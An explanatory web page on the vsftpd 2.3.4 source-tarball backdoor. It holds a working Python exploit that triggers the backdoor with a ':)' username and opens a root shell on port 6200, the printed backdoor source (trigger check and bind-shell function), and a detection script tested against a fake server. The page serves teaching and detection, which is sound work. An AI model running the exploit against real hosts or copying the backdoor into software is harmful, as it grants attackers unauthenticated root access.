Vsftpd 2.0.8 Exploit Github

Rapid7's Metasploit includes an exploit module (not an auxiliary one): exploit/unix/ftp/vsftpd_234_backdoor. As the name says, it targets the 2.3.4 backdoor. Many GitHub repos provide standalone versions of this module for offline use.

GitHub hosts numerous Python scripts that automate the exploit. For example:

import socket

def exploit(host):
    # The trigger is a username containing ":)" (bytes 0x3a 0x29). The
    # original snippet sent "test:", which never fires the backdoor.
    ftp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ftp.connect((host, 21))
    ftp.recv(1024)                     # 220 banner
    ftp.send(b"USER x:)\r\n")
    ftp.recv(1024)                     # 331 password prompt
    ftp.send(b"PASS x\r\n")
    ftp.close()

    # A backdoored server now listens on TCP/6200 and hands out /bin/sh.
    backdoor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    backdoor.connect((host, 6200))
    backdoor.send(b"id\n")
    print(backdoor.recv(1024).decode())

exploit("192.168.1.10")

These scripts are shared, forked, and improved on GitHub daily.

vsftpd 2.0.8 is often confused in write-ups with the 2.3.4 backdoor incident (CVE-2011-2523). The widely discussed, exploitable backdoor affected vsftpd 2.3.4 (2011): an attacker replaced the source tarball on the project's download site with a trojaned copy, so only builds made from that tarball carry the backdoor. It was never a vulnerability in upstream code, and there is no canonical vulnerability in 2.0.8. The Metasploit module exploit/unix/ftp/vsftpd_234_backdoor and the Nmap NSE script ftp-vsftpd-backdoor.nse target that 2.3.4 backdoor, and so do the GitHub repos and blog posts that wrap them.

Cybersecurity courses use the vsftpd 2.3.4 backdoor (not 2.0.8) as a case study, and instructors point students to GitHub for the backdoored source so it can be built and attacked inside isolated VMs.


In the trojaned vsftpd-2.3.4 tarball (not 2.0.8), str.c gained a few lines inside str_contains_space(): the loop that scans a string for whitespace also compares each pair of adjacent bytes against 0x3a 0x29, the ASCII for ":)":

    else if ((p_str->PRIVATE_HANDS_OFF_p_buf[i] == 0x3a)
             && (p_str->PRIVATE_HANDS_OFF_p_buf[i+1] == 0x29))
    {
      vsf_sysutil_extra();
    }

The new function vsf_sysutil_extra() was added to sysdeputil.c. Abbreviated, it binds TCP port 6200, accepts a connection, wires it to stdin/stdout/stderr and execs /bin/sh:

    int vsf_sysutil_extra(void)
    {
      int fd = socket(AF_INET, SOCK_STREAM, 0);
      /* ... bind fd to INADDR_ANY, htons(6200); listen(fd, 100) ... */
      for (;;)
      {
        int rfd = accept(fd, 0, 0);
        dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);   /* client becomes the shell's terminal */
        char *argv[] = { "/bin/sh", NULL };
        execve("/bin/sh", argv, NULL);              /* runs with the daemon's privileges */
      }
    }

No password, no brute force, no authentication: any client that could reach port 21 and send a username containing ":)" got a shell on port 6200, root on typical installs because the listener is spawned before privileges are dropped. Strictly it was not a 0-day (a flaw found by attackers) but a backdoor planted in the distributed source, and it required zero skill to trigger. Note the practical caveat: a "vsFTPd 2.3.4" banner alone proves nothing, since packages built from a clean tarball are unaffected, which is why the Nmap script actively triggers the backdoor instead of matching the version string.
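Added example, written for this page and not taken from any GitHub wrapper or from vsftpd: a Python version of the active check the page attributes to ftp-vsftpd-backdoor.nse, run against a constructed stand-in server so it works offline. contains_trigger() mirrors the 0x3a/0x29 comparison from the trojaned str.c shown above, which also explains why a username like "test:" never fired the backdoor. FakeFtpServer, check_backdoor and the canned "id" reply are this example's own assumptions; the stand-in is not vsftpd and only speaks enough FTP to exercise the scanner.

```python
import socket
import threading
import time

TRIGGER = bytes([0x3A, 0x29])  # ":)", the byte pair the trojaned str.c looks for


def contains_trigger(username: bytes) -> bool:
    """Mirror of the planted check in str_contains_space(): any adjacent
    bytes 0x3a 0x29 in the username fire the backdoor. "test:" does not
    qualify; the ")" is required."""
    return any(username[i] == 0x3A and username[i + 1] == 0x29
               for i in range(len(username) - 1))


class FakeFtpServer:
    """Constructed stand-in for a backdoored build (assumption: this is not
    vsftpd). Listens on 127.0.0.1 with ephemeral ports. With backdoored=True, a
    trigger username makes it start a second listener that answers one command
    with a canned root 'id' line instead of handing out /bin/sh."""

    def __init__(self, backdoored: bool = True):
        self.backdoored = backdoored
        self.ctl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.ctl.bind(("127.0.0.1", 0))
        self.ctl.listen(1)
        self.shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.shell.bind(("127.0.0.1", 0))   # bound but not listening until triggered
        self.port = self.ctl.getsockname()[1]
        self.shell_port = self.shell.getsockname()[1]
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        conn, _ = self.ctl.accept()
        conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
        buf = b""
        while True:
            data = conn.recv(1024)
            if not data:
                break
            buf += data
            while b"\r\n" in buf:
                line, buf = buf.split(b"\r\n", 1)
                if line.upper().startswith(b"USER "):
                    if self.backdoored and contains_trigger(line[5:]):
                        self.shell.listen(1)   # the moment the backdoor "opens"
                        threading.Thread(target=self._shell, daemon=True).start()
                    conn.sendall(b"331 Please specify the password.\r\n")
                else:
                    conn.sendall(b"530 Login incorrect.\r\n")
        conn.close()

    def _shell(self):
        c, _ = self.shell.accept()
        c.recv(1024)                           # whatever command the scanner sends
        c.sendall(b"uid=0(root) gid=0(root)\n")
        c.close()


def check_backdoor(host: str, port: int = 21, shell_port: int = 6200,
                   timeout: float = 3.0) -> dict:
    """Active probe in the spirit of ftp-vsftpd-backdoor.nse: send the trigger
    on the control channel, then see whether a shell answers on shell_port.
    A '2.3.4' banner alone is not evidence; only a reply on the shell port is."""
    with socket.create_connection((host, port), timeout=timeout) as ctl:
        banner = ctl.recv(1024).strip()
        ctl.sendall(b"USER x" + TRIGGER + b"\r\n")
        ctl.recv(1024)
        ctl.sendall(b"PASS x\r\n")
        try:
            ctl.recv(1024)
        except OSError:
            pass
    for _ in range(10):                        # the listener starts asynchronously; retry briefly
        try:
            with socket.create_connection((host, shell_port), timeout=timeout) as sh:
                sh.sendall(b"id\n")
                reply = sh.recv(1024).strip()
                return {"banner": banner, "backdoor": True, "reply": reply}
        except OSError:
            time.sleep(0.2)
    return {"banner": banner, "backdoor": False, "reply": b""}


if __name__ == "__main__":
    for flag in (True, False):
        srv = FakeFtpServer(backdoored=flag)
        print("backdoored build" if flag else "clean build",
              check_backdoor("127.0.0.1", srv.port, srv.shell_port))
```

Against a real host the call is check_backdoor("192.168.1.10") with the default ports; the function only reports a finding when something actually answers on 6200, so a clean 2.3.4 build is reported as not backdoored even though its banner matches.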